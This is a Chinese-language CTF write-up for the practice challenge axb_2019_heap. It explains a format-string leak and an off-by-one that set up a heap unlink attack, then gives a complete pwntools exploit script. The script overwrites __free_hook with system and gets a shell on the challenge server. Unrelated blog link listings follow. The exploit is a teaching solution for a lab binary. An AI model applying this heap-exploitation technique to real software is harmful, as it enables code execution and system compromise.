axb_2019_heap

简单题,格式化字符串泄漏栈地址

算上rsp,格式化字符串参数是栈顺序+6-1

edit有off by one

构造unlink

chunk0

chunk1

chunk2

构造成这样,然后free1就行了

from pwn import *

local = 0

binary = "./axb_2019_heap"

libc_path = '../libc-2.23.so'

port = "27201"

if local == 1:

	p = process(binary)

else:

	p = remote("node3.buuoj.cn",port)

def dbg():

	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

def add(index,size,content):

	p.sendlineafter('>> ','1')

	p.sendlineafter('Enter the index you want to create (0-10):',str(index))

	p.sendlineafter('Enter a size:',str(size))

	p.sendafter('Enter the content: ',content)

def free(index):

	p.sendlineafter('>> ','2')

	p.sendlineafter('Enter an index:',str(index))

def edit(index,content):

	p.sendlineafter('>> ','4')

	p.sendlineafter('Enter an index:',str(index))

	p.sendafter('Enter the content: ',content)

def format_string(name):

	p.sendlineafter('Enter your name:',str(name))

# 11 arg can leak text addr

# 15 arg can leak libc

# overlap chunk , when we free, we need by pass unlink,so we need heap addr

libc = ELF(libc_path)

# format string

format_payload = "%11$p%15$p"

format_string(format_payload)

main_addr = 0x116A

_heaparray = 0x202060

offset = _heaparray - main_addr

p.recvuntil('0x')

heaparray = int(p.recv(12),16) - 28 + offset

print "[*] heaparray = ",hex(heaparray)

p.recvuntil('0x')

libc_base = int(p.recv(12),16) - 240 - libc.sym['__libc_start_main']

print "[*] libc base = ",hex(libc_base)

# off by one to edit

add(0,0x88,'aaaa\n')

add(1,0x88,'bbbb\n')

add(2,0x88,'/bin/sh\x00\n')

add(3,0x88,'protected\n')

fd = heaparray - 0x18

bk = heaparray - 0x10

chunk_0_payload = p64(0) + p64(0x80) + p64(fd) + p64(bk)

chunk_0_payload = chunk_0_payload.ljust(0x80,'a') + p64(0x80)

chunk_0_payload = chunk_0_payload + '\x90'

edit(0,chunk_0_payload)

# unlink

free(1)

system = libc_base + libc.sym['system']

__free_hook = libc_base + libc.sym['__free_hook']

payload = p64(0) * 3 + p64(__free_hook) + p64(0x8) 	# now chunk0 is chunk0 - 0x18

edit(0,payload + '\n')		# now chunk0 is '__free_hook' , we can write it

edit(0,p64(system) + '\n')

free(2)

# gdb.attach(p)

p.interactive()

axb_2019_heap-format_string + off-by-one的更多相关文章

  1. #微码分享#C++变参字符串格式化函数format_string

    在C和C++中,变参格式化函数虽然非类型安全,但却十分便利,因为得到广泛使用.对于常见的size_t类型要用“%zu”,ssize_t用”%zd“,int64_t用“% ”PRId64,uint64_ ...

  2. buuctf-pwn刷题-axb_2019_heap

    版权声明:本文为CSDN博主「L.o.W」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明. 原文链接:https://blog.csdn.net/weixin_441 ...

  3. Python 字符串操作及string模块使用

    python的字符串操作通过2部分的方法函数基本上就可以解决所有的字符串操作需求: python的字符串属性函数 python的string模块 1.字符串属性方法操作: 1.>字符串格式输出对 ...

  4. C和指针 第九章 习题

    9.15 编写函数格式化金钱为标准字符串 #include <stdio.h> #include <string.h> #define TEMP_LEN 1000 void d ...

  5. [译]SSAS下玩转PowerShell(三)

    在第一篇中简单介绍了PowerShell,包含基本的一些命令,以及如何打开PowerShell,并且导航到SSAS对象.第二篇中学习了如何使用变量根据当前日期创建SSAS备份,以及如何运行MDX和XM ...

  6. 习题 5: 更多的变量和打印 | 笨办法学 Python

    一. 简述 “格式化字符串(format string)” -  每一次你使用 ' ’ 或 " " 把一些文本引用起来,你就建立了一个字符串. 字符串是程序将信息展示给人的方式. ...

  7. Sublime Text 2 代码片断

    原文:Snippets 不管是在编码,还是写畅销书,你都可能会需要一遍又一遍的用到一些文本的小片断.使用片断来结束这种单调无聊的码字吧,片断是一种智能的模板,它能在合适的上下文中插入你需要的文本内容. ...

  8. printf 整数类型都用 uint8_t

    #include <iostream> #include <string> #include <tuple>   #include <utility> ...

  9. MDX函数(官方顺序,带示例)

    MDX函数(官方顺序) 1.  AddCalculatedMembers (MDX) 返回通过将计算成员添加到指定集而生成的集. 语法: AddCalculatedMembers(Set_Expres ...

随机推荐

  1. 【大数据】MapReduce开发小实战

    Before:前提:hadoop集群应部署完毕. 一.实战科目:做一个Map Reduce分布式开发,开发内容为统计文件中的单词出现次数. 二.战前准备 1.本人在本地创建了一个用于执行MR的的文件, ...

  2. shiro 退出过滤器 logout ---退出清除HTTPSession数据

    重写LogouFilter类 import org.apache.shiro.web.filter.authc.LogoutFilter; public class ShiroLogoutFilter ...

  3. 详细分析 Java 中启动线程的正确和错误方式

    目录 启动线程的正确和错误方式 前文回顾 start 方法和 run 方法的比较 start 方法分析 start 方法的含义以及注意事项 start 方法源码分析 源码 源码中的流程 run 方法分 ...

  4. GAN生成的评价指标 Evaluation of GAN

    传统方法中,如何衡量一个generator ?-- 用 generator 产生数据的 likelihood,越大越好. 但是 GAN 中的 generator 是隐式建模,所以只能从 P_G 中采样 ...

  5. 初识 Istio - 服务网格管理工具

    What is a service mesh(服务网格)? 微服务在国内流行已经多年了,大多数公司选择了基于容器化技术( Docker )以及容器编排管理平台 ( Kubernetes )落地微服务 ...

  6. 国产化之路-统信UOS + Nginx + Asp.Net MVC + EF Core 3.1 + 达梦DM8实现简单增删改查操作

    专题目录 国产化之路-统信UOS操作系统安装 国产化之路-国产操作系统安装.net core 3.1 sdk 国产化之路-安装WEB服务器 国产化之路-安装达梦DM8数据库 国产化之路-统信UOS + ...

  7. uBuntu安装其他版本Python

    问题描述:阿里云服务器uBuntu版本为16.04,默认Python版本为2.7.12和3.5.2,但是FastAPI,仅支持3.6+版本,因此需要更高版本的Python. 注意:系统自带的Pytho ...

  8. 为Android(和其他移动平台)安装MoSync

    为Android(和其他移动平台)安装MoSync Android教程比赛 这是我提交的文章#2:设置你的Android开发环境.它的主要区别在于它描述了如何安装MoSync,这是一种开发环境,它不是 ...

  9. Windows10系统下wsappx占用CPU资源过高?wsappx是什么?如何关闭wsappx进程?

    在Windows10系统开机的时候,wsappx进程占用的CPU资源非常高,导致电脑运行速度缓慢,那么我们如何关闭wsappx进程,让电脑加快运行速度呢?下面就一起来看一下操作的方法吧. [现象] 1 ...

  10. JMeter实战(一) 体系结构

    此为开篇,介绍JMeter的组成结构,阅读后对JMeter形成整体认知和初步印象. 为了便于后续讲解,先明确下2个术语. 元件:如HTTP请求.事务控制器.响应断言,就是一个元件. 组件:如逻辑控制器 ...